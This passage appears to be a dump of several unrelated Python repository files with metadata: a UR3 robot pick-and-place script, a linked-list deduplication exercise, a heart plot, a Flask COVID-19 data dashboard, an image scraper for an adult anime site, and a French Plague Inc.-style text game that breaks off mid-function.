the correct values for S1~6, as well as the M matrix\n\tM = np.array([[0, -1, 0, 390], [0, 0, -1, 401], [1, 0, 0, 215.5], [0,0,0,1]])\n\n\t# rotation matrix\n\t# given in M as [[0,-1,0],[0,0,1],[1,0,0]] - end effector's x,y,z in base frame's x,y,z\n\n\n\t# q = offset\n\t# q1\n\tq1 = np.array([-150,150,0])\n\t# q2\n\tq2 = np.array([-150,0,162])\n\t# q3\n\tq3 = np.array([94,0,162])\n\t# q4\n\tq4 = np.array([307,0,162])\n\t# q5\n\tq5 = np.array([0,260,162])\n\t# q6\n\tq6 = np.array([390,0,162])\n\n\t# w - rotation axis in base frame\n\t# w1\n\tw1 = np.array([0,0,1])\n\t# w2\n\tw2 = np.array([0,1,0])\n\t# w3\n\tw3 = np.array([0,1,0])\n\t# w4\n\tw4 = np.array([0,1,0])\n\t# w5\n\tw5 = np.array([1,0,0])\n\t# w6\n\tw6 = np.array([0,1,0])\n\n\t# v = -w x q\n\t# v1\n\tv1 = np.cross(-w1, q1)\n\t# v2\n\tv2 = np.cross(-w2, q2)\n\t# v3\n\tv3 = np.cross(-w3, q3)\n\t# v4\n\tv4 = np.cross(-w4, q4)\n\t# v5\n\tv5 = np.cross(-w5, q5)\n\t# v6\n\tv6 = np.cross(-w6, q6)\n\n\t# S = (w, v), w is joint axis and v = -w x q\n\t# S1\n\tS1 = np.array([[0, -1, 0, v1[0]], [1, 0, 0, v1[1]], [0, 0, 0, v1[2]], [0,0,0,0]])\n\t# S1 = [w1, v1]\n\t# S2\n\tS2 = np.array([[0, 0, 1, v2[0]], [0, 0, 0, v2[1]], [-1, 0, 0, v2[2]], [0,0,0,0]])\n\t# S2 = [w2, v2]\n\t# S3\n\tS3 = np.array([[0, 0, 1, v3[0]], [0, 0, 0, v3[1]], [-1, 0, 0, v3[2]], [0,0,0,0]])\n\t# S3 = [w3, v3]\n\t# S4\n\tS4 = np.array([[0, 0, 1, v4[0]], [0, 0, 0, v4[1]], [-1, 0, 0, v4[2]], [0,0,0,0]])\n\t# S4 = [w4, v4]\n\t# S5\n\tS5 = np.array([[0, 0, 0, v5[0]], [0, 0, -1, v5[1]], [0, 1, 0, v5[2]], [0,0,0,0]])\n\t# S5 = [w5, v5]\n\t# S6\n\tS6 = np.array([[0, 0, 1, v6[0]], [0, 0, 0, v6[1]], [-1, 0, 0, v6[2]], [0,0,0,0]])\n\t# S6 = [w6, v6]\n\n\tS = [S1, S2, S3, S4, S5, S6]\n\n\n\t# ==============================================================#\n\treturn M, S\n\n\n\"\"\"\nFunction that calculates encoder numbers for each motor\n\"\"\"\ndef lab_fk(theta1, theta2, theta3, theta4, theta5, theta6):\n\n\t# Initialize the return_value\n\treturn_value = [None, None, None, None, None, None]\n\n\t# =========== Implement joint angle to encoder expressions here ===========\n\tprint(\"Foward kinematics calculated:\\n\")\n\n\t# =================== Your code starts here ====================#\n\n\tM, S = Get_MS()\n\tt1 = np.matmul(expm(S[0] * theta1), expm(S[1] * theta2))\n\tt2 = np.matmul(t1, expm(S[2] * theta3))\n\tt3 = np.matmul(t2, expm(S[3] * theta4))\n\tt4 = np.matmul(t3, expm(S[4] * theta5))\n\tt5 = np.matmul(t4, expm(S[5] * theta6))\n\tT = np.matmul(t5, M)\n\n\n\n\n\n\t# ==============================================================#\n\n\tprint(str(T) + \"\\n\")\n\n\treturn_value[0] = theta1 + PI\n\treturn_value[1] = theta2\n\treturn_value[2] = theta3\n\treturn_value[3] = theta4 - (0.5*PI)\n\treturn_value[4] = theta5\n\treturn_value[5] = theta6\n\n\treturn return_value\n\n\n\n\ndef move_arm(pub_cmd, loop_rate, dest, vel, accel):\n\n global thetas\n global SPIN_RATE\n\n error = 0\n spin_count = 0\n at_goal = 0\n\n driver_msg = command()\n driver_msg.destination = dest\n driver_msg.v = vel\n driver_msg.a = accel\n driver_msg.io_0 = current_io_0\n pub_cmd.publish(driver_msg)\n\n loop_rate.sleep()\n\n while(at_goal == 0):\n\n if( abs(thetas[0]-driver_msg.destination[0]) < 0.0005 and \\\n abs(thetas[1]-driver_msg.destination[1]) < 0.0005 and \\\n abs(thetas[2]-driver_msg.destination[2]) < 0.0005 and \\\n abs(thetas[3]-driver_msg.destination[3]) < 0.0005 and \\\n abs(thetas[4]-driver_msg.destination[4]) < 0.0005 and \\\n abs(thetas[5]-driver_msg.destination[5]) < 0.0005 ):\n\n at_goal = 1\n rospy.loginfo(\"Goal is reached!\")\n\n loop_rate.sleep()\n\n if(spin_count > SPIN_RATE*5):\n\n pub_cmd.publish(driver_msg)\n rospy.loginfo(\"Just published again driver_msg\")\n spin_count = 0\n\n spin_count = spin_count + 1\n\n return error\n\n\ndef move_block(pub_cmd, loop_rate, start_loc, start_height, \\\n end_loc, end_height):\n global Q\n global home\n global digital_in_0\n\n error = 0\n\n # move arm to home first\n move_arm(pub_cmd, loop_rate, home, 4.0, 4.0)\n\n # move arm to start location and turn suction on\n move_arm(pub_cmd, loop_rate, Q[start_loc][start_height], 4.0, 4.0)\n gripper(pub_cmd, loop_rate, suction_on)\n # Delay to make sure suction cup has grasped the block\n time.sleep(1.0)\n\n print(\"*****\")\n print(\"moving from\", start_loc, \"height\", start_height, \"to\", end_loc, \"height\", end_height, \"digin\", digital_in_0)\n if digital_in_0 == 0:\n # rospy.logerr(\"BLOCK NOT FOUND. System quitting...\")\n rospy.loginfo(\"BLOCK NOT FOUND. System quitting...\")\n gripper(pub_cmd, loop_rate, suction_off)\n sys.exit()\n\n # move back to home before going to end location\n move_arm(pub_cmd, loop_rate, home, 4.0, 4.0)\n\n # move arm to end location and turn suction off\n move_arm(pub_cmd, loop_rate, Q[end_loc][end_height], 4.0, 4.0)\n gripper(pub_cmd, loop_rate, suction_off)\n time.sleep(1.0)\n\n\n return error\n\n\n#### custom helper function for main\ndef solveTowerOfHanoi(start, mid, end, height, pub_command, loop_rate, disk):\n global home\n global Q\n global SPIN_RATE\n global counter\n global from_height\n global to_height\n\n if disk == 1:\n start_height = from_height[counter]\n end_height = to_height[counter]\n move_block(pub_command, loop_rate, start, start_height, end, end_height)\n counter += 1\n return\n else:\n solveTowerOfHanoi(start, end, mid, height, pub_command, loop_rate, disk-1)\n start_height = from_height[counter]\n end_height = to_height[counter]\n move_block(pub_command, loop_rate, start, start_height, end, end_height)\n counter += 1\n solveTowerOfHanoi(mid, start, end, height, pub_command, loop_rate, disk-1)\n\n\n\n#### end of custom helper function\ndef move_linear(pub_cmd, loop_rate, height, vel, accel):\n for i in range(3):\n move_arm(pub_cmd, loop_rate, Q[i][height], vel, accel)\n\n\ndef main():\n\n global home\n global Q\n global SPIN_RATE\n\n global start_idx\n global mid_idx\n global end_idx\n global counter\n\n # Initialize ROS node\n rospy.init_node('lab2node')\n\n # Initialize publisher for ur3/command with buffer size of 10\n pub_command = rospy.Publisher('ur3/command', command, queue_size=10)\n\n # Initialize subscriber to ur3/position and callback fuction\n # each time data is published\n sub_position = rospy.Subscriber('ur3/position', position, position_callback)\n\n # TODO: define a ROS subscriber for ur3/gripper_input message and corresponding callback function\n sub_gripper = rospy.Subscriber('ur3/gripper_input', gripper_input, gripper_callback)\n\n\n\n # TODO: modify the code below so that program can get user input\n\n input_done = 0\n loop_count = 0\n \n \n # get user input for number of loops\n while(not input_done):\n input_string = raw_input(\"Enter number of loops \")\n print(\"You entered \" + input_string + \"\\n\")\n\n if(int(input_string) == 1):\n input_done = 1\n loop_count = 1\n elif (int(input_string) == 2):\n input_done = 1\n loop_count = 2\n elif (int(input_string) == 3):\n input_done = 1\n loop_count = 3\n elif (int(input_string) == 0):\n print(\"Quitting... \")\n sys.exit()\n else:\n print(\"Please just enter the character 1 2 3 or 0 to quit \\n\\n\")\n\n\n\n # Check if ROS is ready for operation\n while(rospy.is_shutdown()):\n print(\"ROS is shutdown!\")\n\n rospy.loginfo(\"Sending Goalss ...\")\n\n loop_rate = rospy.Rate(SPIN_RATE)\n\n \n\n while(loop_count > 0):\n # first move arm to home location\n move_arm(pub_command, loop_rate, home, 4.0, 4.0)\n\n ### test\n # move_arm(pub_cmd, loop_rate, dest, vel, accel)\n\n move_linear(pub_command, loop_rate, 0, 4.0, 4.0)\n \n move_arm(pub_command, loop_rate, home, 4.0, 4.0)\n\n move_linear(pub_command, loop_rate, 1, 4.0, 4.0)\n\n move_arm(pub_command, loop_rate, home, 4.0, 4.0)\n\n move_linear(pub_command, loop_rate, 2, 4.0, 4.0)\n\n move_arm(pub_command, loop_rate, home, 4.0, 4.0)\n\n move_arm(pub_command, loop_rate, Q[0][0], 4.0, 4.0)\n rospy.loginfo(\"Trying Suction on ...\")\n gripper(pub_command, loop_rate, suction_on)\n rospy.loginfo(\"Suction on ...\")\n # Delay to make sure suction cup has grasped the block\n time.sleep(1.0)\n if digital_in_0 == 0:\n # rospy.logerr(\"BLOCK NOT FOUND. System quitting...\")\n rospy.loginfo(\"BLOCK NOT FOUND. System quitting...\")\n gripper(pub_command, loop_rate, suction_off)\n sys.exit()\n else:\n rospy.loginfo(\"BLOCK FOUND\")\n gripper(pub_command, loop_rate, suction_off)\n sys.exit()\n\n ### end of test\n\n\n\n loop_count = loop_count - 1\n\n\n gripper(pub_command, loop_rate, suction_off)\n\n\n\n\nif __name__ == '__main__':\n\n try:\n main()\n # When Ctrl+C is executed, it catches the exception\n except rospy.ROSInterruptException:\n pass\n","repo_name":"jaehank2/Pick_and_Place_robot","sub_path":"src/projectandDriver/projectpkg_py/scripts/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":13929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22109565592","text":"\"\"\"\n REMOVE DUPLICATES (CCI 2.1: REMOVE DUPS\n 50CIQ 40: DEDUP LINKED LIST)\n\n Write a function that removes all nodes of a given list with duplicate values.\n\n Consider the following linked list:\n\n 0 ⟶ 0 ⟶ 0 ⟶ 1 ⟶ 2 ⟶ 0 ⟶ 1 ⟶ 4 ⟶ 5\n\n Example:\n ll = Node(0, Node(0, Node(0, Node(1, Node(2, Node(0, Node(1, Node(4, Node(5)))))))))\n Input = ll # Or, the linked list above.\n Output = None # However, ll now has the form: 0 ⟶ 1 ⟶ 2 ⟶ 4 ⟶ 5\n\"\"\"\nimport copy\n\n\n# APPROACH: Naive/Brute Force\n#\n# Iterate over the nodes comparing each node to all following nodes, removing duplicates.\n#\n# Time Complexity: O(n**2), where n is the number of nodes in the linked list.\n# Space Complexity: O(1).\ndef remove_duplicates_naive(head):\n node = head\n while node:\n runner = node\n while runner.next:\n if runner.next.value == node.value:\n runner.next = runner.next.next\n else:\n runner = runner.next\n node = node.next\n return head\n\n\n# APPROACH: Via Previous Pointer & Set\n#\n# Traverse the linked list with a set to maintain previously seen values. Each time a new value is encountered, add the\n# value to the set, update previous.next to point to the (current) node, and set previous to the (current) node. At the\n# end of each iteration, the (current) node is assigned to its next value. Finally, (when node is None), assign\n# previous.next to None and return.\n#\n# Time Complexity: O(n), where n is the number of nodes in the linked list.\n# Space Complexity: O(u), where u is the number of unique values in the linked list.\ndef remove_duplicates_via_set(head):\n if head:\n prev = head\n node = head.next\n s = {head.value}\n while node:\n if node.value not in s:\n s.add(node.value)\n prev.next = node\n prev = node\n node = node.next\n prev.next = None\n return head\n\n\n# APPROACH: Via Set\n#\n# Using a set to maintain previously seen values, traverse the linked list. While the next node has a previously seen\n# value, update the (current) nodes pointer to be next.next. When a next value has not been seen, (current) node is\n# assigned to next node, and if node is not None, the value is added to the set.\n#\n# Time Complexity: O(n), where n is the number of nodes in the linked list.\n# Space Complexity: O(u), where u is the number of unique values in the linked list.\ndef remove_duplicates(head):\n node = head\n if node:\n s = {node.value}\n while node:\n while node.next and node.next.value in s:\n node.next = node.next.next\n node = node.next\n if node:\n s.add(node.value)\n return head\n\n\nclass Node:\n def __init__(self, value, next=None):\n self.value = value\n self.next = next\n\n def __iter__(self):\n yield self.value\n if self.next:\n yield from self.next\n\n def __repr__(self):\n return ' ⟶ '.join(map(repr, self))\n\n\nlinked_lists = [Node(0, Node(0, Node(0, Node(1, Node(2, Node(0, Node(1, Node(4, Node(5))))))))),\n Node(0, Node(1, Node(2, Node(3, Node(4, Node(5)))))),\n Node(0, Node(1, Node(0, Node(1, Node(3, Node(0)))))),\n Node(0, Node(1, Node(0, Node(1, Node(0, Node(0, Node(1, Node(1, Node(2))))))))),\n Node(6, Node(6, Node(6, Node(6, Node(6, Node(6, Node(6, Node(6, Node(6))))))))),\n Node(0, Node(1, Node(2, Node(3, Node(2, Node(1, Node(0))))))),\n Node(1, Node(1)),\n Node(1, Node(2)),\n Node(0),\n None]\nfns = [remove_duplicates_naive,\n remove_duplicates_via_set,\n remove_duplicates]\n\nfor head in linked_lists:\n for fn in fns:\n print(f\"{fn.__name__}({head}): {fn(copy.deepcopy(head))}\")\n print()\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/data_structure/linked_list/remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7028704669","text":"import matplotlib.pyplot as plt\r\nimport scipy as np\r\n\r\nx=np.linspace(-2,2,1000)\r\ny3=np.real(np.sqrt(abs(x)*(1-abs(x))))\r\ny4=np.real(-np.sqrt(1-np.sqrt(abs(x))))\r\nplt.plot(x,y3,color=\"red\")\r\nplt.plot(x,y4,color=\"red\")\r\nplt.xlim([-2,2])\r\nplt.show()\r\n","repo_name":"biswas-neelesh96/Python-Scripts","sub_path":"Heart.py","file_name":"Heart.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31796395305","text":"from flask import Flask, render_template, request, jsonify, send_file, redirect, url_for\nfrom flask_mail import Mail, Message\nimport pandas as pd\nimport requests\nimport json\nimport plotly\nimport plotly.graph_objs as go\n\nwith open(\"info.json\", \"r\") as c:\n parameters = json.load(c)[\"parameters\"]\n\napp = Flask(__name__)\n\napp.config.update(\n MAIL_SERVER = 'smtp.gmail.com',\n MAIL_ASCII_ATTACHMENTS = True,\n MAIL_PORT = '465',\n MAIL_USE_SSL = True,\n MAIL_USERNAME = parameters['gmail-user'],\n MAIL_PASSWORD= parameters['gmail-password']\n)\n\nmail = Mail(app)\n\ndef create_plot(x,y):\n data = [ go.Bar( x=x, y=y)]\n graphJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/tabular')\ndef tabular():\n regional_data = requests.get('https://api.rootnet.in/covid19-in/contacts')\n regional_data = regional_data.json()[\"data\"][\"contacts\"][\"regional\"]\n notifications = requests.get('https://api.rootnet.in/covid19-in/notifications')\n notifications = notifications.json()[\"data\"][\"notifications\"]\n hospital_bed = requests.get('https://api.rootnet.in/covid19-in/hospitals/beds')\n hospital_bed = hospital_bed.json()[\"data\"][\"regional\"]\n medical_col_bed = requests.get('https://api.rootnet.in/covid19-in/hospitals/medical-colleges')\n medical_col_bed = medical_col_bed.json()[\"data\"][\"medicalColleges\"]\n return render_template('tabular.html', medical_col_bed = medical_col_bed, regional_data = regional_data, notifications = notifications, hospital_bed = hospital_bed)\n \n\n@app.route('/statical')\ndef statical():\n dataset = pd.read_csv('covid19india.csv')\n dataset = dataset.drop(['onsetEstimate', 'notes', 'contractedFrom' ], axis = 1)\n dataset = dataset[['patientId', 'reportedOn', 'ageEstimate','gender','state','status']] \n deceased_df = dataset.loc[dataset['status'] == 'Deceased']\n gen_df = deceased_df.pivot_table(index=['gender'], aggfunc='size')\n gen_cat = [\"female\",\"male\"]\n gen=[]\n for i in gen_df:\n gen.append(i)\n state_df = deceased_df.pivot_table(index=['state'], aggfunc='size')\n state_name = [\"Bihar\", \"Delhi\", \"Gujarat\", \"Himachal Pradesh\", \"Jammu and Kashmir\", \"Karnataka\", \"Kerala\", \"Madhya Pradesh\", \"Maharashtra\",\n \"Odisha\", \"Punjab\", \"Rajasthan\", \"Tamil Nadu\", \"Telangana\", \"Uttar Pradesh\", \"West Bengal\"]\n state_case = []\n for i in state_df:\n state_case.append(i)\n date_df = deceased_df.pivot_table(index=['reportedOn'], aggfunc='size')\n date_ddf = [\"02-04-2020\", \"03-04-2020\", \"04-04-2020\", \"05-04-2020\", \"06-04-2020\", \"07-04-2020\", \"08-04-2020\", \"09-04-2020\", \"10-04-2020\", \"11-04-2020\", \"12-04-2020\",\n \"13-04-2020\", \"14-04-2020\", \"15-04-2020\", \"16-04-2020\", \"17-04-2020\", \"18-04-2020\", \"19-04-2020\", \"20-04-2020\", \"21-04-2020\", \"22-04-2020\", \"23-04-2020\",\n \"24-04-2020\", \"25-04-2020\", \"26-04-2020\", \"27-04-2020\", \"28-04-2020\", \"29-04-2020\", \"30-04-2020\", \"31-04-2020\"]\n date_df_total = []\n for i in date_df:\n date_df_total.append(i)\n age_group = [\"1-10\",\"11-20\",\"21-30\",\"31-40\",\"41-50\",\"51-60\",\"61-70\",\"71-80\",\"81-90\"]\n age_death = [1,0,1,2,7,5,17,9,1]\n plot_state = create_plot(state_name, state_case)\n plot_gender = create_plot(gen_cat, gen)\n plot_age = create_plot(age_group, age_death)\n plot_date = create_plot(date_ddf, date_df_total)\n return render_template('graphs.html', plot_state = plot_state, plot_gender = plot_gender, plot_age = plot_age, plot_date = plot_date)\n\n\n@app.route('/api')\ndef api():\n dataset = pd.read_csv('covid19india.csv')\n dataset = dataset.drop(['onsetEstimate', 'notes', 'contractedFrom' ], axis = 1)\n dataset = dataset[['patientId', 'reportedOn', 'ageEstimate','gender','state','status']]\n dataset = dataset.to_dict()\n return jsonify(dataset)\n\n\n@app.route('/mailme', methods=['GET', 'POST'])\ndef mailme():\n if request.method == 'POST':\n email = request.form.get('email')\n msg = Message(subject = 'Covid graph', body = 'Hey! U will find attached pdf with all the relevent data!', sender = parameters['gmail-user'], recipients = [email]) \n with app.open_resource('Doc1.pdf') as fp:\n msg.attach(\"Doc1.pdf\",\"attachment/pdf\",fp.read())\n mail.send(msg)\n return redirect( url_for('statical'))\n\n\n@app.route('/download')\ndef download():\n return send_file('Doc1.pdf', attachment_filename='Doc1.pdf', as_attachment=True)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"EternityProjects-real/VIT-hack2020","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73194083946","text":"from multiprocessing.pool import ThreadPool\nimport requests\nimport click\nimport os\nimport json\n\n\nclass Hanime:\n def __init__(self, folder='./hanime'):\n self.page = 1\n self.last_id = 0\n self.folder = folder\n if not os.path.isdir(self.folder):\n os.makedirs(self.folder)\n\n def scrape_images(self):\n if self.last_id == 0:\n link = \"https://hr.hanime.tv/api/v8/community_uploads?channel_name__in[]=media&channel_name__in[]=nsfw-general&kind=landing&loc=https://hanime.tv\"\n else:\n link = f\"https://hr.hanime.tv/api/v8/community_uploads?channel_name__in[]=media&channel_name__in[]=nsfw-general&channel_name__in[]=yuri&query_method=seek&before_id={self.last_id}&loc=https://hanime.tv\"\n r = requests.get(link).json()\n self.last_id = r['data'][-1]['id']\n return r['data']\n\n def next_page(self):\n self.page += 1\n\n def download(self, image):\n filename = \"id='{}' channel_name='{}' uploader='{}'.{}\".format(image['id'], image['channel_name'], image['username'], image['extension'])\n illegal = ['<', '>', ':', '\"', '/', '\\\\', '|', '?', '*']\n for i in illegal:\n if i in filename:\n filename = filename.replace(i, '')\n\n filepath = os.path.join(self.folder, filename)\n\n if os.path.isfile(filepath + '.temp'):\n os.remove(filepath + '.temp')\n if not os.path.isfile(filepath):\n with open(filepath + '.temp', 'wb') as f:\n print(\"Downloading: \", filename)\n f.write(requests.get(image['url']).content)\n os.replace(filepath + '.temp', filepath)\n\n\n@click.command()\n@click.option('--pages', '-p', required=False, default=0)\n@click.option('--download-dir', '-d', 'folder', required=False, default='./hanime', type=str) # noqa\ndef main(pages, folder):\n imgs = []\n scraper = Hanime(folder)\n\n if not pages:\n pages = [1]\n else:\n pages = [x for x in range(pages)]\n for i in pages:\n print('Current page: {}'.format(scraper.page))\n posters = scraper.scrape_images()\n\n results = ThreadPool(15).imap_unordered(scraper.download, posters)\n for i in results:\n pass\n scraper.next_page()\n\n print('Done!')\n\n\nmain()\n","repo_name":"ArjixWasTaken/A-collection-of-sauce-scrapers-that-I-made","sub_path":"hanime.py","file_name":"hanime.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16589475672","text":"#! /usr/bin/env python3\n\n#___________________________________________Nongma SORGHO___________________________________________#\n#Ceci est une implémentation de ce qui pourrait être l'algorithme à la base du jeu Plague Inc.\n\n\"\"\"\nPlague Inc. est un jeu dans lequel la population mondiale évolue en fonction de certaines variables de maladie.\nJe réaliserai cette expérience pour une maladie bactérienne dont les paramètres symptomatique, de transmission et\nde létalité posséderont 3 niveaux de dangérosité.\nJe prendrai une population mondiale à 7 milliards en supposant que 20% des individus appliquent les règles élémentaires\nd'hygiène, ce qui entravera quelque peu l'évolution de la maladie si elle se trouve en des niveaux peu élevés.\nUn autre facteur empêchant, et pouvant même stopper la propagation de la maladie et qui sera pris en compte par cet\nalgorithme est la recherche qui est menée sur le plan international et qui aboutit après 5 minutes de jeu en temps réel.\nEn début de jeu, le joueur dispose d'un crédit qui lui permettra de faire les améliorations génétiques sur sa maladie.\nPar ailleurs, ce crédit augmentera de 95 unités chaque seconde. Il devra donc faire une efficiente utilisation de son\ncrédit pour atteindre la victoire ! Il existe des mots bonus rapportant une certaine quantité de crédits mais qui\nne pourront être tapés en une seconde que par les plus rapides des joueurs. Alors, seuls les plus expérimentés des joueurs\npourront espérer gagner le niveau difficile.\nPour les symptomes :\n- Niv.1 : 113803 morts/sec Prix : 1000 crédits\n- Niv.2 : 2*113803 morts/sec Prix : 2000 crédits\n- Niv.3 : 3*113803 morts/sec Prix : 3000 crédits\nPour la transmitivité : #Notez que les dégâts infligés par une transmissivité plus grande évolueront de manière exponentielle, ces valeurs sont donc données à titre indicatif\n- Niv.1 : + 20% de victimes en plus Prix : 2000 crédits\n- Niv.2 : + 40% de victimes en plus Prix : 4000 crédits\n- Niv.3 : + 60% de victimes en plus Prix : 8000 crédits\nPour la létalité :\n- Niv.1 : 250520 morts/sec Prix : 1500 crédits\n- Niv.2 : 2*250520 morts/sec Prix : 3000 crédits\n- Niv.3 : 3*250520 morts/sec Prix : 5000 crédits\n\"\"\"\n\nimport time\nimport signal\nimport os\nimport random\n\npopulation = 7000000000\nrecherche = 0\ncredit = 2500\nniveau_symptome = 0\nniveau_transmissivite = 0\nniveau_letalite = 0\nsymptome = 113803\ntransmissivite = 0.2\nletalite = 250520\ncompteur = 0\n\ndef routine_principale() :\n print(\" Bienvenue sur Plague Inc. by Gerard!\\n\")\n time.sleep(3)\n for i in range(3 , 0, -1) :\n if i == 1 :\n print(\" Une nouvelle partie débutera dans\", i, \"seconde\\n\")\n time.sleep(1)\n os.system('cls')\n else :\n print(\" Une nouvelle partie débutera dans\", i, \"secondes\\n\")\n time.sleep(1)\n os.system('cls')\n reponse = str(input(\" Bienvenue sur la version minimaliste, si on puisse se le permettre, de Plague Inc.\\n Touchez 'C' pour commencer la partie\\n\"\n \" Vous trouverez les instructions et l'aide de jeu en appuyant sur 'A'\\n Appuyez sur 'Q' pour quitter la partie\\n\"))\n if reponse == \"C\" or reponse == \"c\" :\n dif = str(input(\" Vous avez le choix entre trois (03) niveaux de difficulté : 'F' pour Facile, 'M' pour moyen et 'D' pour Difficile.\\n Veuillez choisir s'il vous plait !\\n\"))\n if dif == \"F\" or dif == \"f\" :\n return maladie(population, recherche, credit, symptome,\n niveau_symptome, transmissivite, niveau_transmissivite, letalite, niveau_letalite, compteur, 1)\n if dif == \"M\" or dif == \"m\" :\n return maladie(population, recherche, credit, symptome,\n niveau_symptome, transmissivite, niveau_transmissivite, letalite, niveau_letalite, compteur,\n 0.5)\n if dif == \"D\" or dif == \"d\" :\n return maladie(population, recherche, credit, symptome,\n niveau_symptome, transmissivite, niveau_transmissivite, letalite, niveau_letalite, compteur,\n 0.2)\n if reponse == \"A\" or reponse == \"a\" :\n print(\"Vous disposerez d'une seconde pour chaque instruction que vous taperez\\n\"\n \"Pour les symptomes : 'S'\\n\"\n \"- Niv.1 : 113803 morts/sec Prix : 1000 crédits\\n\"\n \"- Niv.2 : 2*113803 morts/sec Prix : 2000 crédits\\n\"\n \"- Niv.3 : 3*113803 morts/sec Prix : 3000 crédits\\n\"\n \"Pour la transmitivité : 'T'\\n#Notez que les dégâts infligés par une transmissivité plus grande évolueront de manière exponentielle, ces valeurs sont donc données à titre indicatif\\n\"\n \"- Niv.1 : + 20% de victimes en plus Prix : 2000 crédits\\n\"\n \"- Niv.2 : + 40% de victimes en plus Prix : 4000 crédits\\n\"\n \"- Niv.3 : + 60% de victimes en plus Prix : 8000 crédits\\n\"\n \"Pour la létalité : 'L'\\n\"\n \"- Niv.1 : 250520 morts/sec Prix : 1500 crédits\\n\"\n \"- Niv.2 : 2*250520 morts/sec Prix : 3000 crédits\\n\"\n \"- Niv.3 : 3*250520 morts/sec Prix : 5000 crédits\\n\"\n \"#Vous aurez 200 crédits en tapant 'cadeau'\\n#Vous aurez 500 crédits en tapant 'chanceux' avec une chance de 75%\\n#Vous aurez 100 crédits en tapant 'cent\\n\"\n \"Appuyez 'R' pour retourner au jeu et 'Q' pour quitter\\n\")\n a = str(input())\n if a == 'R' or a == 'r' :\n return routine_principale()\n else :\n return\n if reponse == \"Q\" :\n return\n\ntotal = 0\ndef maladie(population, recherche, credit, symptome,\n niveau_symptome, transmissivite, niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte) :\n global total\n total += credit\n couleurs = ['echo \"\\033[30m Plague Inc., par Gérard!\\033[00m\"', 'echo \"\\033[31m Plague Inc., par Gérard!\\033[00m\"', 'echo \"\\033[32m Plague Inc., par Gérard!\\033[00m\"',\n 'echo \"\\033[33m Plague Inc., par Gérard!\\033[00m\"',\n 'echo \"\\033[34m Plague Inc., par Gérard!\\033[00m\"', 'echo \"\\033[35m Plague Inc., par Gérard!\\033[00m\"',\n 'echo \"\\033[36m Plague Inc., par Gérard!\\033[00m\"', 'echo \"\\033[37m Plague Inc., par Gérard!\\033[00m\"']\n os.system(couleurs[random.randint(0,7)])\n print(\"Avancée de la recherche :\", int(recherche), \"%\\n\\n\"+\" Population :\", int(population), \" Morts :\", int(7e9-population), \"\\n\\n\"+\" Crédit :\", credit, \"\\n\\n\"\n \" Niveaux :\",\n \"Gène S: Niv.\" + str(niveau_symptome)+\" | \", \"Gène T: Niv.\" + str(niveau_transmissivite)+\" | \",\n \"Gène L: Niv.\" + str(niveau_letalite)+\" \\n\")\n action = str(entree(\"#Instructions pour les passages de niveaux des paramètres de votre maladie :\\n#Vous taperez 'S' pour Symptome, 'T' pour transmissivité, \"\n \"'L' pour létalité\\n#Vous aurez 200 crédits en tapant 'cadeau'\\n#Vous aurez 500 crédits en tapant 'chanceux' avec une chance de 75%\\n#Vous aurez 100 crédits en tapant 'cent'\\n\\n\"))\n if population <= 0.0 :\n score = total + 20000/recherche\n print(\"Avancée de la recherce :\", recherche, \"%\\n\\n Population : 0\", \"\\n\\n Crédit :\", credit, \"\\n\\n\"\n \"Niveaux :\",\n \"Gène S: Niv.\"+str(niveau_symptome)+\" \", \"Gène T: Niv.\"+str(niveau_transmissivite)+\" \", \"Gène L: Niv.\"+str(niveau_letalite)+\" \\n\\n\")\n print(\"$$$$$Vous avez gagné, votre maladie a exterminé la population mondiale!$$$$$\\n\"\n \"Votre score est de\", score)\n rejouer = str(input(\"*Souhaitez-vous rejouer ? (Répondez par 'O' pour Oui et 'N' pour Non)*\\n\"))\n if rejouer == 'O' or rejouer == 'o' :\n return routine_principale()\n else :\n print(\"*A bientôt pour une nouvelle partie de Plague Inc.*\")\n return\n if recherche >= 100 :\n score = total + 20000 / recherche\n print(\" Avancée de la recherce : 100\", \"%\\n\\n Population :\", population, \"\\n\\n Crédit :\", credit, \"\\n\\n\"\n \"Niveaux :\",\n \"Gène S: Niv.\" + str(niveau_symptome) + \" \", \"Gène T: Niv.\" + str(niveau_transmissivite) + \" \",\n \"Gène L: Niv.\" + str(niveau_letalite) + \" \\n\\n\")\n print(\"____Vous avez échoué, un remède a été trouvé à votre maladie !____\\n\"\n \"Votre score est de\", score)\n rejouer = str(input(\"*Souhaitez-vous rejouer ? (Répondez par 'O' pour Oui et 'N' pour Non)*\\n\"))\n if rejouer == 'O':\n return routine_principale()\n else:\n print(\"*A bientôt pour une nouvelle partie de Plague Inc.*\")\n return\n else :\n os.system('cls')\n compteur += difficulte\n if recherche >= 80 :\n recherche += 0.54\n if recherche < 80 :\n recherche += 0.36\n credit += 95\n population -= (symptome * niveau_symptome + letalite * niveau_letalite) + (symptome * niveau_symptome + letalite * niveau_letalite) * transmissivite * niveau_transmissivite * compteur\n if action == \"cheat\" or action == \"CHEAT\" or action == \"tri\" or action == \"TRI\" :\n population -= 1000000000\n if action == 'chanceux' or action == 'CHANCEUX' :\n if random.random() >= 0.75 :\n credit += 500\n if action == \"cadeau\" or action == \"CADEAU\" :\n credit += 200\n if action == \"cent\" or action == \"CENT\" :\n credit += 100\n if (action == \"S\" or action == 's') and niveau_symptome <= 2 :\n if niveau_symptome == 0 and credit >= 1000:\n credit -= 1000\n niveau_symptome += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n 